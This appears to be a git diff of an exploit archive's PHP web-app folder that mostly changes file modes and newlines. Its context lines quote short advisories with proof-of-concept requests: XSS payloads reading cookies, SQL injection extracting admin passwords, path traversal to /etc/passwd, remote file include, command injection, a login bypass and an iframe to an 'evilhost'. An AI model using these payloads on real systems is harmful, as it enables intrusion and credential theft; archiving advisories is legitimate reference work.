mode 100644 index 649b56c9a..a235c4fed --- a/platforms/php/webapps/25639.txt +++ b/platforms/php/webapps/25639.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?mod=stats&aff=pages&annee=[XSS INJECTION] http://www.example.com/profil.php?id=1%20[XSS INJECTION] http://www.example.com/memberlist.php?mb_lettre=%A4%20[XSS INJECTION] http://www.example.com/memberlist.php?mb1_order=id&mb1_ord=DESC&lettre=[XSS INJECTION] -http://www.example.com/index.php?&mod=recherche&choix_recherche=2&chaine_search=[XSS INJECTION]&multi_mots=tous&choix_forum=1&auteur_search=[XSS INJECTION] \ No newline at end of file +http://www.example.com/index.php?&mod=recherche&choix_recherche=2&chaine_search=[XSS INJECTION]&multi_mots=tous&choix_forum=1&auteur_search=[XSS INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/25640.txt b/platforms/php/webapps/25640.txt old mode 100755 new mode 100644 index 1ef70a84b..cb322df59 --- a/platforms/php/webapps/25640.txt +++ b/platforms/php/webapps/25640.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce The vendor has addressed this issue in PwsPHP version 1.2.3; earlier versions are reported vulnerable. -http://www.example.com/profil.php?id='[SQL Injection] \ No newline at end of file +http://www.example.com/profil.php?id='[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/25641.txt b/platforms/php/webapps/25641.txt old mode 100755 new mode 100644 index ce2cab0b7..9f9279b5b --- a/platforms/php/webapps/25641.txt +++ b/platforms/php/webapps/25641.txt @@ -4,4 +4,4 @@ WowBB is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/wowbb/view_user.php?list=1&letter=&sort_by='[SQL Injection] \ No newline at end of file +http://www.example.com/wowbb/view_user.php?list=1&letter=&sort_by='[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/25642.txt b/platforms/php/webapps/25642.txt old mode 100755 new mode 100644 index 0d3c085ac..2ad50f0d7 --- a/platforms/php/webapps/25642.txt +++ b/platforms/php/webapps/25642.txt @@ -11,4 +11,4 @@ The following Base64-encoded string is equivalent to <script>alert()</script><h1 PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+ http://www.example.com/security.php?codigo= -PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+ \ No newline at end of file +PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+PGgxPlhTUyBQb1dAICEhITwvaDE+ \ No newline at end of file diff --git a/platforms/php/webapps/25644.txt b/platforms/php/webapps/25644.txt old mode 100755 new mode 100644 index f8822751d..8954d79e5 --- a/platforms/php/webapps/25644.txt +++ b/platforms/php/webapps/25644.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13573/info e107 Website System is prone to a directory traversal vulnerability. This issue could be exploited to obtain the contents of arbitrary files on the vulnerable computer. -http://www.example.com/request.php?../../e107_config.php \ No newline at end of file +http://www.example.com/request.php?../../e107_config.php \ No newline at end of file diff --git a/platforms/php/webapps/25645.txt b/platforms/php/webapps/25645.txt old mode 100755 new mode 100644 index 9ee7169fe..086fee2a6 --- a/platforms/php/webapps/25645.txt +++ b/platforms/php/webapps/25645.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13576/info e107 Website System is prone to an SQL injection vulnerability. This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. -http://www.example.com/forum_viewforum.php?5.[INJECTION]# \ No newline at end of file +http://www.example.com/forum_viewforum.php?5.[INJECTION]# \ No newline at end of file diff --git a/platforms/php/webapps/25650.txt b/platforms/php/webapps/25650.txt old mode 100755 new mode 100644 index 13080eaa5..f17c54ba5 --- a/platforms/php/webapps/25650.txt +++ b/platforms/php/webapps/25650.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue is reported to affect Quick.Cart version 0.3.0; other versions may also be affected. http://www.example.com/?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/index.php?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25653.txt b/platforms/php/webapps/25653.txt old mode 100755 new mode 100644 index 9d21eb53c..6eda15835 --- a/platforms/php/webapps/25653.txt +++ b/platforms/php/webapps/25653.txt @@ -4,4 +4,4 @@ DirectTopics is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/topic.php?topic=669%B4SQL%20INJECTION \ No newline at end of file +http://www.example.com/topic.php?topic=669%B4SQL%20INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/25654.txt b/platforms/php/webapps/25654.txt old mode 100755 new mode 100644 index d1d0e4bc4..10ae08752 --- a/platforms/php/webapps/25654.txt +++ b/platforms/php/webapps/25654.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th http://www.example.com/forum/viewforum.php?id=t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3Cnote%20unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61 %6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C')%20==%20'%22%3E<script ->alert(document.cookie)</script>%3C \ No newline at end of file +>alert(document.cookie)</script>%3C \ No newline at end of file diff --git a/platforms/php/webapps/25655.txt b/platforms/php/webapps/25655.txt old mode 100755 new mode 100644 index dc96d62fa..34120a18f --- a/platforms/php/webapps/25655.txt +++ b/platforms/php/webapps/25655.txt @@ -5,4 +5,4 @@ Ultimate PHP Board is prone to an SQL injection vulnerability. This issue is due Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/forum/viewforum.php?id=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%7 -5%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C \ No newline at end of file +5%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C \ No newline at end of file diff --git a/platforms/php/webapps/25656.txt b/platforms/php/webapps/25656.txt old mode 100755 new mode 100644 index d9899cc0a..f14636929 --- a/platforms/php/webapps/25656.txt +++ b/platforms/php/webapps/25656.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue reportedly affects OpenBB version 1.0.8; other versions may also be vulnerable. http://www.example.com/openbb/read.php?action=lastpost&TID=' -http://www.example.com/openbb/read.php?TID=' \ No newline at end of file +http://www.example.com/openbb/read.php?TID=' \ No newline at end of file diff --git a/platforms/php/webapps/25657.txt b/platforms/php/webapps/25657.txt old mode 100755 new mode 100644 index 7ddbf61e6..eed38ff2d --- a/platforms/php/webapps/25657.txt +++ b/platforms/php/webapps/25657.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue reportedly affects OpenBB version 1.0.8; other versions may also be vulnerable. -http://www.example.com/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script> \ No newline at end of file +http://www.example.com/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script> \ No newline at end of file diff --git a/platforms/php/webapps/25659.txt b/platforms/php/webapps/25659.txt old mode 100755 new mode 100644 index e7b4903b0..3b879da34 --- a/platforms/php/webapps/25659.txt +++ b/platforms/php/webapps/25659.txt @@ -4,4 +4,4 @@ phpMyChat is prone to a cross-site scripting vulnerability because it fails to p An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt; \ No newline at end of file +http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/2566.txt b/platforms/php/webapps/2566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25660.txt b/platforms/php/webapps/25660.txt old mode 100755 new mode 100644 index 8a265c477..9c11286a8 --- a/platforms/php/webapps/25660.txt +++ b/platforms/php/webapps/25660.txt @@ -4,4 +4,4 @@ phpMyChat is prone to a cross-site scripting vulnerability because it fails to p An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt; \ No newline at end of file +http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/25662.txt b/platforms/php/webapps/25662.txt old mode 100755 new mode 100644 index 91f5c1298..ef8ab441d --- a/platforms/php/webapps/25662.txt +++ b/platforms/php/webapps/25662.txt @@ -12,4 +12,4 @@ Skull-Splitter Guestbook versions 1.0, 2.0, and 2.2 have been reported to be vul Type in the title or content of msg -2. <iframe src=http://evilhost/evil.php> \ No newline at end of file +2. <iframe src=http://evilhost/evil.php> \ No newline at end of file diff --git a/platforms/php/webapps/25663.txt b/platforms/php/webapps/25663.txt old mode 100755 new mode 100644 index 2742a6d5b..65f4dce9b --- a/platforms/php/webapps/25663.txt +++ b/platforms/php/webapps/25663.txt @@ -4,4 +4,4 @@ Shop-Script is prone to an SQL injection vulnerability. This issue is due to a f Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/index.php?categoryID='[SQL inj] \ No newline at end of file +http://www.example.com/index.php?categoryID='[SQL inj] \ No newline at end of file diff --git a/platforms/php/webapps/25664.txt b/platforms/php/webapps/25664.txt old mode 100755 new mode 100644 index 595b81d04..a098febfc --- a/platforms/php/webapps/25664.txt +++ b/platforms/php/webapps/25664.txt @@ -5,4 +5,4 @@ Shop-Script is prone to an SQL injection vulnerability. This issue is due to a f Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/index.php?mark=5&productID='[SQL inj] -http://www.example.com/index.php?productID='[SQL inj] \ No newline at end of file +http://www.example.com/index.php?productID='[SQL inj] \ No newline at end of file diff --git a/platforms/php/webapps/25665.txt b/platforms/php/webapps/25665.txt old mode 100755 new mode 100644 index 1e5a1d14d..47a3a5976 --- a/platforms/php/webapps/25665.txt +++ b/platforms/php/webapps/25665.txt @@ -6,4 +6,4 @@ The problem presents itself when an attacker passes a name for a target file, al An attacker may leverage this issue to disclose arbitrary files on an affected computer. It was also reported that an attacker can supply NULL bytes with a target file name. This may aid in other attacks such as crashing the server. -http://www.example.com/index.php?module=Blocks&type=lang&func=../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?module=Blocks&type=lang&func=../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/2567.txt b/platforms/php/webapps/2567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25671.txt b/platforms/php/webapps/25671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25672.txt b/platforms/php/webapps/25672.txt old mode 100755 new mode 100644 index c768d60f5..992474305 --- a/platforms/php/webapps/25672.txt +++ b/platforms/php/webapps/25672.txt @@ -10,4 +10,4 @@ All versions are considered to be vulnerable at the moment. http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors -http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u \ No newline at end of file +http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u \ No newline at end of file diff --git a/platforms/php/webapps/25673.txt b/platforms/php/webapps/25673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25674.txt b/platforms/php/webapps/25674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25675.txt b/platforms/php/webapps/25675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25676.txt b/platforms/php/webapps/25676.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25677.txt b/platforms/php/webapps/25677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25678.txt b/platforms/php/webapps/25678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25679.txt b/platforms/php/webapps/25679.txt old mode 100755 new mode 100644 index 68fe19fc8..90da2ad42 --- a/platforms/php/webapps/25679.txt +++ b/platforms/php/webapps/25679.txt @@ -6,4 +6,4 @@ Successful exploitation of the SQL injection issues could result in a compromise An attacker may leverage the cross-site scripting issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/jgs_portal_sponsor.php?id=[SQL-Injection] \ No newline at end of file +http://www.example.com/jgs_portal_sponsor.php?id=[SQL-Injection] \ No newline at end of file diff --git a/platforms/php/webapps/2568.txt b/platforms/php/webapps/2568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25681.php b/platforms/php/webapps/25681.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25682.txt b/platforms/php/webapps/25682.txt old mode 100755 new mode 100644 index 9a284ae32..6a2c9e8bb --- a/platforms/php/webapps/25682.txt +++ b/platforms/php/webapps/25682.txt @@ -4,4 +4,4 @@ Wordpress is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS] \ No newline at end of file +http://www.example.com/wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25683.txt b/platforms/php/webapps/25683.txt old mode 100755 new mode 100644 index aa83e86a4..332c646f8 --- a/platforms/php/webapps/25683.txt +++ b/platforms/php/webapps/25683.txt @@ -21,4 +21,4 @@ http://www.example.com/support/lh/icon.php?status=-99' UNION SELECT password,password FROM hcl_operators WHERE id=1/* http://www.example.com/support/lh/chat_download.php?fid=-99' UNION -SELECT password,operator,password FROM hcl_operators WHERE id=1/* \ No newline at end of file +SELECT password,operator,password FROM hcl_operators WHERE id=1/* \ No newline at end of file diff --git a/platforms/php/webapps/25686.txt b/platforms/php/webapps/25686.txt old mode 100755 new mode 100644 index 8707fa52e..889804029 --- a/platforms/php/webapps/25686.txt +++ b/platforms/php/webapps/25686.txt @@ -4,4 +4,4 @@ PHP Advanced Transfer Manager is prone to an arbitrary file include vulnerabilit An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/index.php?include_location=http://www.example.com/ \ No newline at end of file +http://www.example.com/index.php?include_location=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25689.txt b/platforms/php/webapps/25689.txt old mode 100755 new mode 100644 index ed9e057c4..ffc1c70a6 --- a/platforms/php/webapps/25689.txt +++ b/platforms/php/webapps/25689.txt @@ -10,4 +10,4 @@ http://www.example.com/topo/index.php?m=top&s=info"><script>alert()</script>&ID= http://www.example.com/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar http://www.example.com/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT>alert()</script> http://www.example.com/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT>alert()</script> -http://www.example.com/topo/index.php?m=members&s=html&t=edit"><SCRIPT>alert()</script> \ No newline at end of file +http://www.example.com/topo/index.php?m=members&s=html&t=edit"><SCRIPT>alert()</script> \ No newline at end of file diff --git a/platforms/php/webapps/25693.txt b/platforms/php/webapps/25693.txt old mode 100755 new mode 100644 index a084029dc..71c6903d7 --- a/platforms/php/webapps/25693.txt +++ b/platforms/php/webapps/25693.txt @@ -8,4 +8,4 @@ An attacker can supply arbitrary shell commands through the affected parameter t GForge versions prior to 4.0 are vulnerable to this issue. -GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a \ No newline at end of file +GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a \ No newline at end of file diff --git a/platforms/php/webapps/2570.txt b/platforms/php/webapps/2570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25704.txt b/platforms/php/webapps/25704.txt old mode 100755 new mode 100644 index 8b241472f..34402844e --- a/platforms/php/webapps/25704.txt +++ b/platforms/php/webapps/25704.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code UPDATE: Further information shows that this issue does not affect version 1.04. -http://www.example.com/poll_vote.php?relativer_pfad=http://www.example.com/ \ No newline at end of file +http://www.example.com/poll_vote.php?relativer_pfad=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/2572.txt b/platforms/php/webapps/2572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25720.txt b/platforms/php/webapps/25720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25721.txt b/platforms/php/webapps/25721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25723.txt b/platforms/php/webapps/25723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25724.txt b/platforms/php/webapps/25724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25726.txt b/platforms/php/webapps/25726.txt old mode 100755 new mode 100644 index dcdb30869..9f9da3ad4 --- a/platforms/php/webapps/25726.txt +++ b/platforms/php/webapps/25726.txt @@ -25,5 +25,4 @@ $query = "SELECT * FROM `playlist` WHERE $playlist_id;"; http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12 -################################################ - \ No newline at end of file +################################################ \ No newline at end of file diff --git a/platforms/php/webapps/25727.txt b/platforms/php/webapps/25727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25728.txt b/platforms/php/webapps/25728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25729.txt b/platforms/php/webapps/25729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2573.php b/platforms/php/webapps/2573.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25730.txt b/platforms/php/webapps/25730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25731.txt b/platforms/php/webapps/25731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25732.txt b/platforms/php/webapps/25732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25733.txt b/platforms/php/webapps/25733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25734.txt b/platforms/php/webapps/25734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25735.txt b/platforms/php/webapps/25735.txt old mode 100755 new mode 100644 index afd5f4963..58302d709 --- a/platforms/php/webapps/25735.txt +++ b/platforms/php/webapps/25735.txt @@ -4,4 +4,4 @@ BookReview is prone to multiple cross-site scripting vulnerabilities. These issu An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT> \ No newline at end of file +http://www.example.com/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT> \ No newline at end of file diff --git a/platforms/php/webapps/2574.php b/platforms/php/webapps/2574.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25740.txt b/platforms/php/webapps/25740.txt old mode 100755 new mode 100644 index f19d349ea..7ad1a88b2 --- a/platforms/php/webapps/25740.txt +++ b/platforms/php/webapps/25740.txt @@ -8,4 +8,4 @@ This may facilitate the theft of cookie-based authentication credentials as well JAWS versions 0.4 and 0.5 and subsequent are reportedly vulnerable. -http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script src=some script</script> \ No newline at end of file +http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script src=some script</script> \ No newline at end of file diff --git a/platforms/php/webapps/25741.bat b/platforms/php/webapps/25741.bat old mode 100755 new mode 100644 index 1887038cd..d9df449ea --- a/platforms/php/webapps/25741.bat +++ b/platforms/php/webapps/25741.bat @@ -22,4 +22,4 @@ echo enter p=num(example:760594) id you want to edit: set /p %pnum%= echo enter any key to go the edit post page... pause -start iexplore.exe %url%forumid%/index.php?act=Post&CODE=08&f=%forumid%&t=%topicid%&p=%pnum% \ No newline at end of file +start iexplore.exe %url%forumid%/index.php?act=Post&CODE=08&f=%forumid%&t=%topicid%&p=%pnum% \ No newline at end of file diff --git a/platforms/php/webapps/25742.txt b/platforms/php/webapps/25742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25743.txt b/platforms/php/webapps/25743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25744.txt b/platforms/php/webapps/25744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25745.txt b/platforms/php/webapps/25745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25746.txt b/platforms/php/webapps/25746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25747.txt b/platforms/php/webapps/25747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25748.txt b/platforms/php/webapps/25748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25749.txt b/platforms/php/webapps/25749.txt old mode 100755 new mode 100644 index 8c04cb199..3c14e0366 --- a/platforms/php/webapps/25749.txt +++ b/platforms/php/webapps/25749.txt @@ -7,4 +7,4 @@ This may result in the theft of authentication credentials, destruction or discl All versions of NPDS are considered vulnerable to this issue at the moment. http://www.example.com/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/s -qlinjection.txt'/* \ No newline at end of file +qlinjection.txt'/* \ No newline at end of file diff --git a/platforms/php/webapps/2575.php b/platforms/php/webapps/2575.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25750.txt b/platforms/php/webapps/25750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25756.txt b/platforms/php/webapps/25756.txt old mode 100755 new mode 100644 index 73fbd9507..c01ee0547 --- a/platforms/php/webapps/25756.txt +++ b/platforms/php/webapps/25756.txt @@ -7,4 +7,4 @@ This vulnerability could permit remote attackers to pass malicious input to data All versions are considered to be vulnerable at the moment. Uername =admin -Password=" or 0=0 # \ No newline at end of file +Password=" or 0=0 # \ No newline at end of file diff --git a/platforms/php/webapps/25759.txt b/platforms/php/webapps/25759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2576.txt b/platforms/php/webapps/2576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25760.txt b/platforms/php/webapps/25760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25761.txt b/platforms/php/webapps/25761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25762.txt b/platforms/php/webapps/25762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25763.txt b/platforms/php/webapps/25763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25764.txt b/platforms/php/webapps/25764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25765.txt b/platforms/php/webapps/25765.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25766.txt b/platforms/php/webapps/25766.txt old mode 100755 new mode 100644 index eb6fedd63..f5a33d833 --- a/platforms/php/webapps/25766.txt +++ b/platforms/php/webapps/25766.txt @@ -7,4 +7,4 @@ These vulnerabilities could permit remote attackers to pass malicious input to d X-Cart 4.0.8 is reportedly vulnerable. Other versions may be affected as well. http://www.example.com/giftcert.php?gcid='><script>alert(document.cookie)</script> -http://www.example.com/giftcert.php?gcindex='><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/giftcert.php?gcindex='><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25767.txt b/platforms/php/webapps/25767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25768.txt b/platforms/php/webapps/25768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25769.txt b/platforms/php/webapps/25769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2577.txt b/platforms/php/webapps/2577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25770.txt b/platforms/php/webapps/25770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25771.txt b/platforms/php/webapps/25771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25772.txt b/platforms/php/webapps/25772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25773.txt b/platforms/php/webapps/25773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25774.txt b/platforms/php/webapps/25774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25777.txt b/platforms/php/webapps/25777.txt old mode 100755 new mode 100644 index 9edd003a2..3d72153d0 --- a/platforms/php/webapps/25777.txt +++ b/platforms/php/webapps/25777.txt @@ -4,4 +4,4 @@ PowerDownload is prone to a remote file include vulnerability. This issue is due An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/download/downloads.php?release_id=650&incdir=http://www.example.com/ \ No newline at end of file +http://www.example.com/download/downloads.php?release_id=650&incdir=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25778.txt b/platforms/php/webapps/25778.txt old mode 100755 new mode 100644 index 1e0ddf0ef..f7721b1f3 --- a/platforms/php/webapps/25778.txt +++ b/platforms/php/webapps/25778.txt @@ -8,4 +8,4 @@ http://www.example.com/cal_day.php?op=day&date=2005-05-03&catview=1[sql]/* http://www.example.com/cal_pophols.php?id=999'[sql]/* http://www.example.com/calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1 http://www.example.com/cal_week.php?op=week&catview= 999'[sql]/* -http://www.example.com/cal_cat.php?op=cats&catview=999'[sql]*/ \ No newline at end of file +http://www.example.com/cal_cat.php?op=cats&catview=999'[sql]*/ \ No newline at end of file diff --git a/platforms/php/webapps/25779.txt b/platforms/php/webapps/25779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2578.txt b/platforms/php/webapps/2578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25786.txt b/platforms/php/webapps/25786.txt old mode 100755 new mode 100644 index d32b9260c..61d86d5e2 --- a/platforms/php/webapps/25786.txt +++ b/platforms/php/webapps/25786.txt @@ -4,4 +4,4 @@ MWChat is affected by a remote file include vulnerability. This issue is due to An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.example.com/ \ No newline at end of file +http://www.example.com/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25787.txt b/platforms/php/webapps/25787.txt old mode 100755 new mode 100644 index 5fc4e315c..2ca96db44 --- a/platforms/php/webapps/25787.txt +++ b/platforms/php/webapps/25787.txt @@ -5,4 +5,4 @@ LiteWeb Server is prone to a vulnerability that may let remote attackers bypass The specific issue is inadequate sanitization of user-supplied requests. In particular, there is an error in the handling of slash characters '/\' that will allow remote users to access protected files. http://www.example.com/\admin\/login.html -http://www.example.com//admin//login.html \ No newline at end of file +http://www.example.com//admin//login.html \ No newline at end of file diff --git a/platforms/php/webapps/25788.txt b/platforms/php/webapps/25788.txt old mode 100755 new mode 100644 index 50d7dd558..0b0f62f55 --- a/platforms/php/webapps/25788.txt +++ b/platforms/php/webapps/25788.txt @@ -4,4 +4,4 @@ Popper is affected by a remote file include vulnerability. This issue is due to An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/popper/childwindow.inc.php?form=http://www.example.com/test \ No newline at end of file +http://www.example.com/popper/childwindow.inc.php?form=http://www.example.com/test \ No newline at end of file diff --git a/platforms/php/webapps/25792.txt b/platforms/php/webapps/25792.txt old mode 100755 new mode 100644 index c0affdbdc..c05f5a4a9 --- a/platforms/php/webapps/25792.txt +++ b/platforms/php/webapps/25792.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary server-side script co This issue is reported to affect YaPiG versions 0.92b, 0.93u and 0.94u; earlier versions may also be affected. Version 0.92b: http://www.example.com/global.php?BASE_DIR=/local/path/to/global-gen.php 